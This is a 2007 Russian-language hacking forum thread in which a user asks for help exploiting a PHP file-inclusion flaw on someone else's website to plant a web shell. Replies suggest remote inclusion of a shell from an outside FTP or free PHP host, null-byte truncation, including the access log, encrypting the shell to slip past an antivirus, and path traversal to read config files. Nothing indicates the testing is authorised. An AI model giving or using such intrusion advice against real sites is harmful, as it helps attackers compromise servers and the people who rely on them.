Помогите с PHP Inj

Discussion in 'Песочница' started by CraF, 17 Nov 2007.

  1. CraF

    CraF Banned

    Joined:
    9 Aug 2005
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    Вообщем есть сайт такого вида:

    _http://www.site.com/site.php?page=index

    после рандомного текста вводимого вместо index, выдает следующее:

    Code:
    Warning: main(ggsdf.php) [function.main]: failed to open stream: No such file or directory in /home/site/public_html/site.php on line 61
    
    Warning: main(ggsdf.php) [function.main]: failed to open stream: No such file or directory in /home/site/public_html/site.php on line 61
    
    Fatal error: main() [function.require]: Failed opening required 'ggsdf.php' (include_path='.:/usr/local/lib/php') in /home/site/public_html/site.php on line 61
    Но после подстановки шелла в адресной строке, выдает следующее:

    Service Temporarily Unavailable

    The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

    Как это можно обойти?
     
    1 person likes this.
  2. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Попробуй указать вместо http://host/shell ссылку с фтп, т.е. - ftp://login:pass@host/shell

    Кстате если укажешь site вместо index, то возможно будет рекурсия =)
     
    1 person likes this.
  3. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    имхо будет то же самое что и при http
    Просто такая фигня появляется из-за url file access
    ТС, пробуй отбросить разширение с помощью нулл-байта и ищи скрипт для аплода файлов
    Или пробуй инклудить ацес_лог - что не очень действенно =\
     
    2 people like this.
  4. CraF

    CraF Banned

    Joined:
    9 Aug 2005
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    Да, аналогичная ситуация что и с http =\

    %00 также не помогло =\
     
  5. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Spyder, если там url file access, то %00 там никак не поможет :)
     
  6. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Это ты ошибаешься, Spyder все правильно сказал, он говорил про локальный инклюд, а не ты не CraF непоняли про что он говорил
     
    1 person likes this.
  7. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    А да, извиняюсь, думал про %00 было сказано в тему про ремоут..ну да ладно)
     
    2 people like this.
  8. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Посмотрел, при добовление нулл байта такая же фигня происходит
    имхо ничего не сделаеш
    Если конечно сможешь залить как нибудь пшп файл, что вообще нереально =)
     
  9. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Странно, что при вписывании набора букв он выдает нормальную ошибку, а как инклюдишь шелл, то он пишет бред...у меня такое ощущение, что у них просто Iis там, антивирь или что-то подобное ловит шелл и просто не пускает его. ТС, попробуй проинклудить что-нить другое, или закрипти шелл.
     
  10. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    гг, ИИС на никс сервере =)
    Дело не в шелле. а в символах которые ты вводишь в строку
    Попробуй перейти по ссылке site.php?%00 будет такая же фигня
    Там просто фильтры стоят
     
    #10 Spyder, 17 Nov 2007
    Last edited: 17 Nov 2007
  11. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Ааа...с ИИС тупанул =\ Не посмотрел что там путь есть)

    Но мой вариант стоит попробовать, уже встречался с таким.
     
  12. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    тут по крайней мере есть хсс

    ты правильно шелл лепил? т.е. кидаешь, например на холм вида site.h17.ru/file, где на серваке уже подцепляется php, попробуй поискать файл конфига, т.е. если на сервере есть какой-нить бесплатный, или нет, борда, типа пхпбб, то попробуй вида http://site.com/../../config or http://site.com/../../config.inc нужно смотреть по ситуации, жаль локального не вытащишь. такс.
     
  13. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190

    Гы... xss есть, там написано же что он выводит сообщугу об ошибке, xss - 'то само сабой, там фильтр идет на http:/ ftp:/ %00 в _REQUEST кто муже magic quotes on, кароче ничего сделать нельзя да и конфиги инклюдить бесполезно, это же инклюд а не читалка
     
    1 person likes this.
  14. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    омфг, Снейк, во первых Xss там нету, я проверил, во второх идёт фильтрация символов. Ты мой пост читал вообще?
     
    1 person likes this.
  15. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    блин. люди не тупите плз =) Там сразу идёт фильтраци на %00 и ftp:// http://
    Scipio прав
     
    #15 Spyder, 17 Nov 2007
    Last edited: 17 Nov 2007
  16. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    я сказал на как думал и не тестил, ибо нет ссылки, а лучше выложить ссылку и не быть магами-чародеями-предсказателями. ссылку в студию!